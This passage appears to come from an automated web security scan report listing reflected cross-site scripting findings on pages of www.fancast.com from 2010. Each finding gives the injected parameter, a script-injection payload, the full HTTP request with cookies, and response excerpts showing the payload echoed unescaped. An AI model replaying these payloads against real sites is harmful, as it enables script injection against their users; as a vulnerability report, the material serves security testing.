GET /blogs/2010/tuned-in-what-to-watch-todayaac6b</script><script>alert(1)</script>eec3ce1ded8/what-to-watch-weekend-31/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:21 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:21 GMT Content-Length: 39601
2.448. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1ceb</script><script>alert(1)</script>eb55516c8da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/?a1ceb</script><script>alert(1)</script>eb55516c8da=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:15 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:15 GMT Content-Length: 39616
2.449. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a481c"><script>alert(1)</script>361134a11a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a481c\"><script>alert(1)</script>361134a11a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/?a481c"><script>alert(1)</script>361134a11a6=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:10 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:10 GMT Content-Length: 39586
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d7b"><script>alert(1)</script>e0d7ae58bf was submitted in the REST URL parameter 3. This input was echoed as 64d7b\"><script>alert(1)</script>e0d7ae58bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news64d7b"><script>alert(1)</script>e0d7ae58bf/bachelor-brad-womack-there-is-a-very-happy-ending/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:52 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:52 GMT Content-Length: 43943
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 975db</script><script>alert(1)</script>4de78dbee15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news975db</script><script>alert(1)</script>4de78dbee15/bachelor-brad-womack-there-is-a-very-happy-ending/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:55 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:55 GMT Content-Length: 43978
2.452. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac1d"><script>alert(1)</script>e52a7dfad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4ac1d\"><script>alert(1)</script>e52a7dfad6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/?4ac1d"><script>alert(1)</script>e52a7dfad6f=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:46 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:46 GMT Content-Length: 43963
2.453. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73787</script><script>alert(1)</script>5d9f98c4b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/?73787</script><script>alert(1)</script>5d9f98c4b46=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:51 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:50 GMT Content-Length: 43993
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15b1b</script><script>alert(1)</script>f1f02f11dc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news15b1b</script><script>alert(1)</script>f1f02f11dc8/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:55 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:54 GMT Content-Length: 38731
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c996"><script>alert(1)</script>ede090263f2 was submitted in the REST URL parameter 3. This input was echoed as 8c996\"><script>alert(1)</script>ede090263f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news8c996"><script>alert(1)</script>ede090263f2/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:51 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:51 GMT Content-Length: 38701
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>'Dexter's Julia Stiles: I Didn't ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news8c996\"><script>alert(1)</script>ede090263f2/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/"/> ...[SNIP]...
2.456. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191b3</script><script>alert(1)</script>aa6d4223d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/?191b3</script><script>alert(1)</script>aa6d4223d87=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:50 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:50 GMT Content-Length: 38746
2.457. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668d1"><script>alert(1)</script>252dfa3392b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 668d1\"><script>alert(1)</script>252dfa3392b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/?668d1"><script>alert(1)</script>252dfa3392b=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:46 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:46 GMT Content-Length: 38716
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>'Dexter's Julia Stiles: I Didn't ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/?668d1\"><script>alert(1)</script>252dfa3392b=1"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2556c"><script>alert(1)</script>504c36f7f5e was submitted in the REST URL parameter 3. This input was echoed as 2556c\"><script>alert(1)</script>504c36f7f5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news2556c"><script>alert(1)</script>504c36f7f5e/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:52 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:51 GMT Content-Length: 39733
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Good-bye to Larry King: We'll Mi ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news2556c\"><script>alert(1)</script>504c36f7f5e/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f4ed</script><script>alert(1)</script>7858e663d33 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news6f4ed</script><script>alert(1)</script>7858e663d33/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:55 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:55 GMT Content-Length: 39763
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Good-bye to Larry King: We'll Mi ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news6f4ed</script><script>alert(1)</script>7858e663d33/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTranspar ...[SNIP]...
2.460. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8833b</script><script>alert(1)</script>27e43f2b7ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?8833b</script><script>alert(1)</script>27e43f2b7ab=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:51 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:50 GMT Content-Length: 39778
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Good-bye to Larry King: We'll Mi ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?8833b</script><script>alert(1)</script>27e43f2b7ab=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig ...[SNIP]...
2.461. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9ce"><script>alert(1)</script>2cc6ca50639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc9ce\"><script>alert(1)</script>2cc6ca50639 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?dc9ce"><script>alert(1)</script>2cc6ca50639=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:46 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:46 GMT Content-Length: 39748
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Good-bye to Larry King: We'll Mi ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?dc9ce\"><script>alert(1)</script>2cc6ca50639=1"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70cce"><script>alert(1)</script>9d2167a49b7 was submitted in the REST URL parameter 3. This input was echoed as 70cce\"><script>alert(1)</script>9d2167a49b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news70cce"><script>alert(1)</script>9d2167a49b7/huge-ratings-for-larry-kings-finale/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:16 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:15 GMT Content-Length: 34271
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Huge Ratings for Larry King's Fi ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news70cce\"><script>alert(1)</script>9d2167a49b7/huge-ratings-for-larry-kings-finale/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d2b</script><script>alert(1)</script>a46c743dd20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news50d2b</script><script>alert(1)</script>a46c743dd20/huge-ratings-for-larry-kings-finale/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:19 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:19 GMT Content-Length: 34301
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Huge Ratings for Larry King's Fi ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news50d2b</script><script>alert(1)</script>a46c743dd20/huge-ratings-for-larry-kings-finale/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; ...[SNIP]...
2.464. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af5a3"><script>alert(1)</script>aa00e785c7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as af5a3\"><script>alert(1)</script>aa00e785c7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?af5a3"><script>alert(1)</script>aa00e785c7b=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:10 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:10 GMT Content-Length: 34286
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Huge Ratings for Larry King's Fi ...[SNIP]... <meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?af5a3\"><script>alert(1)</script>aa00e785c7b=1"/> ...[SNIP]...
2.465. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eba9</script><script>alert(1)</script>c87a4b3b6aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?5eba9</script><script>alert(1)</script>c87a4b3b6aa=1 HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:12:15 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:17:14 GMT Content-Length: 34316
<!DOCTYPE html> <html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <meta charset="utf-8"> <title>Huge Ratings for Larry King's Fi ...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/?5eba9</script><script>alert(1)</script>c87a4b3b6aa=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3522"><script>alert(1)</script>dd80bc7577f was submitted in the REST URL parameter 3. This input was echoed as a3522\"><script>alert(1)</script>dd80bc7577f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/2010/tv-newsa3522"><script>alert(1)</script>dd80bc7577f/jersey-shores-ronnie-indicted-on-assault-charge/ HTTP/1.1 Host: www.fancast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.6 X-Pingback: /blogs/xmlrpc.php Content-Type: text/html; charset=UTF-8 Date: Sun, 19 Dec 2010 18:19:51 GMT Connection: close Connection: Transfer-Encoding Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:51 GMT Content-Length: 34824
